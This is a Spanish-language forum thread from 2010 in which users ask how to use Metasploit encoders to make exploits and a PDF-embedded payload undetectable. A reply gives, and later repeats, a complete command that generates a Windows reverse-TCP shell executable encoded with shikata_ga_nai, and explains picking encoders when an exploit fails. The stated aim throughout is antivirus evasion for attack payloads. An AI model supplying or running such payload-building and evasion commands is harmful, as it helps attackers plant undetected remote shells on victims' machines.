Encoders de Metasploit

Iniciado por illera88, 18 Febrero 2010, 12:06 PM

0 Miembros y 1 Visitante están viendo este tema.

illera88

Pues lo dicho. ¿Cómo se usal los encoders de metasploit para hacer indetectables nuestros exploits?
¿Se pude hacer indetectabel con el msf un pdf con un exploit incrustado y con un payload reverse_tcp??

Un saludo

Shell Root

mmm Los Encoders son usandos de 2 formás!

1. Dentro de la consola Shell de Linux (Pará ver las opciones ejecutar ./msfencode -h)
shell@Alex:~/msf3$ ./msfencode -h

y para usarlo con un archivo binario. Así:
shell@Alex:~/msf3$ ./msfpayload windows/shell_reverse_tcp LHOST=172.0.0.1 LPORT=1234 R | ./msfencode -e x86/shikata_ga_nai -t exe > /home/shellroot/Archivo_Codificado1.exe

2. Al momento de lanzar un Exploit
En ocasiones al momento de lanzar un exploit, nos saldra un hermoso mensaje de... Exploit failed: No encoders encoded the buffer successfully... ahora para solucionar este failed, ejecutamos show encoders, para visualizar los que son soportados por el exploit, y despues, SET Nombre_Encoder.




Con respecto a la otra duda, de encodear un archivo *.PDF, no tengo ni la más minima idea... xD
Por eso no duermo, por si tras mi ventana hay un cuervo. Cuelgo de hilos sueltos sabiendo que hay veneno en el aire.

alexkof158

#2
vale tenia en mente esto, seria en vez de poner aaa.exe poner el dd.pdf no?? a ver si se podra encodear este archivo? 
"noproxy"

Shell Root

Lo dudo alexkof158, ya que estamos refiriendonos a un Ejecutable. Mirad...
shell@Alex:~/msf3$ ./msfpayload windows/shell_reverse_tcp LHOST=172.0.0.1 LPORT=1234 R | ./msfencode -e x86/shikata_ga_nai -t exe > /home/shellroot/Archivo_Codificado1.exe
En la siguiente cadena, nos referimos a un Archivo Ejecutable
shell@Alex:~/msf3$  [...] exe > /home/shellroot/Archivo_Codificado1.exe
Por eso no duermo, por si tras mi ventana hay un cuervo. Cuelgo de hilos sueltos sabiendo que hay veneno en el aire.